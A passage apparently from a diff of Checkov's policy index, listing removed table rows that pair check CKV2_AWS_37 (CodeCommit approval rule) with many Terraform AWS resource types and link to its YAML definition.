[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 609 | CKV2_AWS_37 | resource | aws_appautoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 610 | CKV2_AWS_37 | resource | aws_appautoscaling_scheduled_action | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 611 | CKV2_AWS_37 | resource | aws_appautoscaling_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 612 | CKV2_AWS_37 | resource | aws_appmesh_mesh | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 613 | CKV2_AWS_37 | resource | aws_appmesh_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 614 | CKV2_AWS_37 | resource | aws_appmesh_virtual_node | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 615 | CKV2_AWS_37 | resource | aws_appmesh_virtual_router | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 616 | CKV2_AWS_37 | resource | aws_appmesh_virtual_service | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 617 | CKV2_AWS_37 | resource | aws_appsync_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 618 | CKV2_AWS_37 | resource | aws_appsync_datasource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 619 | CKV2_AWS_37 | resource | aws_appsync_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 620 | CKV2_AWS_37 | resource | aws_appsync_graphql_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 621 | CKV2_AWS_37 | resource | aws_appsync_resolver | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 622 | CKV2_AWS_37 | resource | aws_athena_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 623 | CKV2_AWS_37 | resource | 
aws_athena_named_query | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 624 | CKV2_AWS_37 | resource | aws_athena_workgroup | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 625 | CKV2_AWS_37 | resource | aws_autoscaling_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 626 | CKV2_AWS_37 | resource | aws_autoscaling_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 627 | CKV2_AWS_37 | resource | aws_autoscaling_lifecycle_hook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 628 | CKV2_AWS_37 | resource | aws_autoscaling_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 629 | CKV2_AWS_37 | resource | aws_autoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 630 | CKV2_AWS_37 | resource | aws_autoscaling_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 631 | CKV2_AWS_37 | resource | aws_backup_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 632 | CKV2_AWS_37 | resource | aws_backup_selection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 633 | CKV2_AWS_37 | resource | aws_backup_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 634 | CKV2_AWS_37 | resource | aws_batch_compute_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 635 | CKV2_AWS_37 | resource | aws_batch_job_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 636 | CKV2_AWS_37 | resource | aws_batch_job_queue | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 637 | CKV2_AWS_37 | resource | aws_budgets_budget | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 638 | CKV2_AWS_37 | resource | aws_cloud9_environment_ec2 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 639 | CKV2_AWS_37 | resource | aws_cloudformation_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 640 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 641 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 642 | CKV2_AWS_37 | resource | aws_cloudfront_distribution | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 643 | CKV2_AWS_37 | resource 
| aws_cloudfront_origin_access_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 644 | CKV2_AWS_37 | resource | aws_cloudfront_public_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 645 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 646 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_hsm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 647 | CKV2_AWS_37 | resource | aws_cloudtrail | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 648 | CKV2_AWS_37 | resource | aws_cloudwatch_dashboard | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 649 | CKV2_AWS_37 | resource | aws_cloudwatch_event_permission | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 650 | CKV2_AWS_37 | resource | aws_cloudwatch_event_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 651 | CKV2_AWS_37 | resource | aws_cloudwatch_event_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 652 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 653 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 654 | CKV2_AWS_37 | resource | aws_cloudwatch_log_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 655 | CKV2_AWS_37 | resource | aws_cloudwatch_log_metric_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 656 | CKV2_AWS_37 | resource | 
aws_cloudwatch_log_resource_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 657 | CKV2_AWS_37 | resource | aws_cloudwatch_log_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 658 | CKV2_AWS_37 | resource | aws_cloudwatch_log_subscription_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 659 | CKV2_AWS_37 | resource | aws_cloudwatch_metric_alarm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 660 | CKV2_AWS_37 | resource | aws_codebuild_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 661 | CKV2_AWS_37 | resource | aws_codebuild_source_credential | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 662 | CKV2_AWS_37 | resource | aws_codebuild_webhook | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 663 | CKV2_AWS_37 | resource | aws_codecommit_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 664 | CKV2_AWS_37 | resource | aws_codecommit_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 665 | CKV2_AWS_37 | resource | aws_codedeploy_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 666 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 667 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 668 | CKV2_AWS_37 | resource | aws_codepipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 669 | CKV2_AWS_37 | resource | aws_codepipeline_webhook | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 670 | CKV2_AWS_37 | resource | aws_codestarnotifications_notification_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 671 | CKV2_AWS_37 | resource | aws_cognito_identity_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 672 | CKV2_AWS_37 | resource | aws_cognito_identity_pool_roles_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 673 | CKV2_AWS_37 | resource | aws_cognito_identity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 674 | CKV2_AWS_37 | resource | aws_cognito_resource_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 675 | CKV2_AWS_37 | resource | aws_cognito_user_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 676 | CKV2_AWS_37 | resource | aws_cognito_user_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 677 | CKV2_AWS_37 | resource | aws_cognito_user_pool_client | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 678 | CKV2_AWS_37 | resource | aws_cognito_user_pool_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 679 | CKV2_AWS_37 | resource | aws_config_aggregate_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 680 | CKV2_AWS_37 | resource | aws_config_config_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 681 | CKV2_AWS_37 | resource | aws_config_configuration_aggregator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 682 | CKV2_AWS_37 | resource | 
aws_config_configuration_recorder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 683 | CKV2_AWS_37 | resource | aws_config_configuration_recorder_status | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 684 | CKV2_AWS_37 | resource | aws_config_delivery_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 685 | CKV2_AWS_37 | resource | aws_config_organization_custom_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 686 | CKV2_AWS_37 | resource | aws_config_organization_managed_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 687 | CKV2_AWS_37 | resource | aws_cur_report_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 688 | CKV2_AWS_37 | resource | aws_customer_gateway | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 689 | CKV2_AWS_37 | resource | aws_datapipeline_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 690 | CKV2_AWS_37 | resource | aws_datasync_agent | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 691 | CKV2_AWS_37 | resource | aws_datasync_location_efs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 692 | CKV2_AWS_37 | resource | aws_datasync_location_nfs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 693 | CKV2_AWS_37 | resource | aws_datasync_location_s3 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 694 | CKV2_AWS_37 | resource | aws_datasync_location_smb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 695 | CKV2_AWS_37 | resource | aws_datasync_task | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 696 | CKV2_AWS_37 | resource | aws_dax_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 697 | CKV2_AWS_37 | resource | aws_dax_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 698 | CKV2_AWS_37 | resource | aws_dax_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 699 | CKV2_AWS_37 | resource | aws_db_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 700 | CKV2_AWS_37 | resource | aws_db_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 701 | CKV2_AWS_37 | resource | aws_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 702 | CKV2_AWS_37 | resource | 
aws_db_instance_role_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 703 | CKV2_AWS_37 | resource | aws_db_option_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 704 | CKV2_AWS_37 | resource | aws_db_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 705 | CKV2_AWS_37 | resource | aws_db_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 706 | CKV2_AWS_37 | resource | aws_db_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 707 | CKV2_AWS_37 | resource | aws_db_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 708 | CKV2_AWS_37 | resource | aws_default_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 709 
| CKV2_AWS_37 | resource | aws_default_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 710 | CKV2_AWS_37 | resource | aws_default_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 711 | CKV2_AWS_37 | resource | aws_default_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 712 | CKV2_AWS_37 | resource | aws_default_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 713 | CKV2_AWS_37 | resource | aws_default_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 714 | 